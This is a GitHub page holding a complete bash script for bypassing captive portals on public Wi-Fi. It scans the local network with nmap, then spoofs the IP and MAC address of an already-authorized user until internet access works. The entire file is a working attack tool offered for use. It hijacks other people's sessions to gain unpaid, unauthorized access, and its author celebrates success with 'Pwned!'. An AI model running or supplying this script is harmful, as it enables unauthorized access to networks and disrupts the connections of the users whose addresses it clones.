forked from crishoj/hack-captive-portals
-
Notifications
You must be signed in to change notification settings - Fork 0
/
hack-captive.sh
executable file
·131 lines (119 loc) · 5.31 KB
/
hack-captive.sh
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
#!/usr/bin/env bash
# =========================================================================== #
# FILE: hackaptive.sh #
# USAGE: sudo ./hackaptive.sh #
# #
# DESCRIPTION: This script helps to pass through the captive portals in #
# public Wi-Fi networks. It hijacks IP and MAC from somebody #
# who is already connected and authorized on captive portal. #
# Tested in Ubuntu 16.04 with different captive portals in #
# airports and hotels all over the world. #
# #
# REQUIREMENTS: coreutils, sipcalc, nmap #
# NOTES: Let the information always be free! #
# AUTHOR: Stanislav "systematicat" Kotivetc, <@systematicat> #
# COMPANY: Hire me! I am a cool dude! #
# VERSION: 1.0 #
# CREATED: 16.12.2016 - 23:59 #
# REVISION: --- #
# COPYRIGHT: 2016 Stanislav "systematicat" Kotivetc #
# LICENSE: WTFPL v2 #
# =========================================================================== #
# Find the initial parameters of wireless interface.
interface="$(ip -o -4 route show to default | awk '/dev/ {print $5}')"
localip="$(ip -o -4 route get 1 | awk '/src/ {print $7}')"
wifissid="$(iw dev "$interface" link | awk '/SSID/ {print $NF}')"
gateway="$(ip -o -4 route show to default | awk '/via/ {print $3}')"
broadcast="$(ip -o -4 addr show dev "$interface" | awk '/brd/ {print $6}')"
ipmask="$(ip -o -4 addr show dev "$interface" | awk '/inet/ {print $4}')"
netmask="$(printf "%s\n" "$ipmask" | cut -d "/" -f 2)"
netaddress="$(sipcalc "$ipmask" | awk '/Network address/ {print $NF}')"
network="$netaddress/$netmask"
macaddress="$(ip -0 addr show dev "$interface" \
| awk '/link/ && /ether/ {print $2}' \
| tr '[:upper:]' '[:lower:]')"
# Check for running as root.
function check_sudo() {
if [[ "$EUID" -ne 0 ]]; then
printf "%b\n" "ERROR This script must be run as root. Use sudo." >&2
exit 1
fi
}
# Create a temporary folder for script work.
function create_tmp() {
unset tmp
tmp="$(mktemp -q -d "${TMPDIR:-/tmp}/hackaptive_XXXXXXXXXX")" || {
printf "%b\n" "ERROR Unable to create temporary folder. Abort." >&2
exit 1
}
}
# Clean tmp/ on exit due to any reason.
function clean_up() {
rm -rf "$tmp"
trap 0
exit
}
# Split up big networks into smaller chunks of /24.
function calc_network() {
printf "%b\n" "Exploring network in \"$wifissid\" Wi-Fi hotspot."
if [[ "$netmask" -lt 24 ]]; then
sipcalc -s 24 "$network" \
| awk '/Network/ {print $3}' > "$tmp"/networklist.$$.txt
printf "%b\n" "Splitting up network $network into smaller chunks."
else
printf "%s\n" "$network" | cut -d "/" -f 1 > "$tmp"/networklist.$$.txt
fi
}
# Select network, set netmask, scan it for IP and MAC and hijack them. Repeat.
function main() {
while read -r networkfromlist; do
if [[ "$netmask" -lt 24 ]]; then
network="$networkfromlist/24"
else
network="$networkfromlist/$netmask"
fi
# Scan selected network for active hosts.
printf "%b\n" "Looking for active hosts in $network. Please wait."
nmap -n -sn -PR -PS -PA -PU -T5 --exclude "$localip","$gateway" "$network" \
| awk '/for/ {print $5} ; /Address/ {print $3}' \
| sed '$!N;s/\n/ - /' > "$tmp"/hostsalive.$$.txt
# Set founded IP and MAC for wireless interface.
while read -r hostline; do
newipset="$(printf "%s\n" "$hostline" | awk '{print $1}')"
newmacset="$(printf "%s\n" "$hostline" \
| awk '{print $3}' \
| tr '[:upper:]' '[:lower:]')"
printf "%b\n" "Trying to hijack $newipset - $newmacset"
ip link set "$interface" down
ip link set dev "$interface" address "$newmacset"
ip link set "$interface" up
ip addr flush dev "$interface"
ip addr add "$newipset/$netmask" broadcast "$broadcast" dev "$interface"
ip route add default via "$gateway"
sleep 1
# Check if Google DNS pingable with our new IP and MAC.
ping -c1 -w1 8.8.8.8 >/dev/null
if [[ $? -eq 0 ]]; then
printf "%b\n" "Pwned! Now you can surf the Internet!"
exit 0
fi
done < "$tmp"/hostsalive.$$.txt
rm -rf "$tmp"/hostsalive.$$.txt
printf "%b\n" "Suitable hosts not found. Checking another network chunk."
done < "$tmp"/networklist.$$.txt
rm -rf "$tmp"/networklist.$$.txt
printf "%b\n" "No luck! Try again later or try another Wi-Fi hotspot."
# Restore original MAC and IP.
ip link set "$interface" down
ip link set dev "$interface" address "$macaddress"
ip link set "$interface" up
ip addr flush dev "$interface"
ip addr add "$ipmask" broadcast "$broadcast" dev "$interface"
ip route add default via "$gateway"
}
# Functions start here.
trap clean_up 0 1 2 3 15
check_sudo
create_tmp
calc_network
main